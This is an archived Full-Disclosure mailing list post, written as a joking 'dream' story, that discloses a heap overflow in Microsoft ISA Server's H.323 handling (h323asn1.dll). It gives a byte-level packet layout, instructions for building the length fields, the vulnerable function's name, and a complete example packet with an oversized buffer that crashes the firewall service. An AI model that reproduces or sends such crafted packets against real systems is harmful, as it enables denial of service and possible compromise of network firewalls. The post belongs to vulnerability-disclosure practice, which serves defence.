[Full-Disclosure] Phrack #64 Is Release!

deleon_at_hushmail.com
Date: 02/07/04

  • Next message: Spiro Trikaliotis: "Re: [Full-Disclosure] [SECURITY] [DSA 435-1] New mpg123 packages fix heap overflow"
    To: full-disclosure@lists.netsys.com
    Date: Fri,  6 Feb 2004 23:47:22 -0800
    
    

    HAAHAHAHHAH just kidding, is only ms004-04 attacking ways.
    Soooo we have our fun with isa, now you can also! Now even people who
    can not afford the corporate firewall, can still own one!

    So I have this crazy dream a few weeks earlier (maybe ate too much acid)
    that I send some bytes to a isa server and it withers up like ding spider.
    This is funny because I thought spiders coming out from my arm, but that
    is an other bad story for next email. Anyway bytes went like this-

    03 00 xx xx 08 02 00 00-5a 7e xx xx 05 00 80 00
    00 00 42 42 42 42 42 42-42 42 42 42 42 42 42 42
    42 42 04 0A xx xx 80 xx-xx xx xx buffer starts here

    And somehow I know that first 13 bytes were error packet sent back from
    isa, like when you have really nice dream that you know the girl is michele
    branch even though you can't see the face, almost like that. Others xx
    are for lengths, yes these were xx in the dream and somehow again I know
    there are for length.

    Soo I was very surprise when I woke and tried it and it worked. I had
    to plugged in buffer but then I saw microsoft firewall service (wspsrv
    process) crash and after then it was more dead than a foundstone christmas
    party. I discover it was a heap overflow and I even found how. The problem
    is h323asn1.dll which ms004-04 patch, and microsoft tried to make this
    hard to find by changing lost of fake things, but we have no problem
    seeing the True Patch. Old function is sub_40fa6d, new is sub_40f627,
     and patch checks a word to see that it is short enough. This word is
    actually length of a string that follows (use ethereal to understand
    packet) and it can be any length but a few kb is enough to overflow in
    ways similar to a eeye bar tab at defcon.

    So most easy way to get to broken code is to use second h225 decode function,
     this is sub_419011 in unpatched dll. And of course a breakpoint of the
    function will show that it is reach after sending error packet back to
    isa. Then just follow trace through and see how to get to sub_40fa6d.

    Simple like that. Oh yeah here are ways to make lengths----
    03 00
    (word length of all packet, even 03 00, all is big byte first order)

    08 02 00 00 5a 7e
    (word length of data that follows)
    05 00 80 00 00 00
    (16 byte conference id, I use BBBBBBBBBBBBBBBB above)
    04 0a
    (frag length of all data that follows)
    80
    (frag length of all data that follows)
    (word length of string that follows -1, like 0 means length is 1, 1 means
    length is 2 etc.)
    (very long string)

    And a frag length can be most easy done as 0x8000+length, like 0x9234
    means length of next data that follows is 0x1234. More gets supported
    but trust me this will work for exploit ;)

    Like an example--
    03 00 10 2f 08 02 00 00-5a 7e 10 23 05 00 80 00
    00 00 42 42 42 42 42 42-42 42 42 42 42 42 42 42
    42 42 04 0a 90 09 80 90-06 10 03 (buffer with 0x1004 'A')

    I wish this is right, I cant sleep so much since all the spiders keep
    coming out from my arm. But they help me type this email so you can start
    having isa fun also.
    Don't feed the kids! Keep the knowledge free.

    Concerned about your privacy? Follow this link to get
    FREE encrypted email: https://www.hushmail.com/?l=2

    Free, ultra-private instant messaging with Hush Messenger
    https://www.hushmail.com/services.php?subloc=messenger&l=434

    Promote security and make money with the Hushmail Affiliate Program:
    https://www.hushmail.com/about.php?subloc=affiliate&l=427

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html


  • Next message: Spiro Trikaliotis: "Re: [Full-Disclosure] [SECURITY] [DSA 435-1] New mpg123 packages fix heap overflow"

    Relevant Pages

    • Re: Insurance
      ... frag wrote: ... Only in that you can only have one cash ISA and one stocks & shares ISA ... Just follow that and it's a doddle, buy low, sell high. ... Keeping one for ages is losing you money, as you're not selling high, ...
      (uk.rec.motorcycles)
    • Re: Internetzugang für beliebige User zeitweise sperren
      ... Im Filter und Regelwerk vom ISA dürfen Domänen-Benutzer ... Dann definier hier andere Regeln die mit extra Gruppen arbeiten und nutze ... Frag einfach mal ... in der ISA Group danach, die können dir das sicher verraten. ...
      (microsoft.public.de.german.win2000.gruppen_richtlinien)
    • Re: Insurance
      ... frag wrote: ... Look at any index performance over 10 or more years and they all have 3- ... Just follow that and it's a doddle, buy low, sell high. ... An ISA is just a tax-free bank account, ...
      (uk.rec.motorcycles)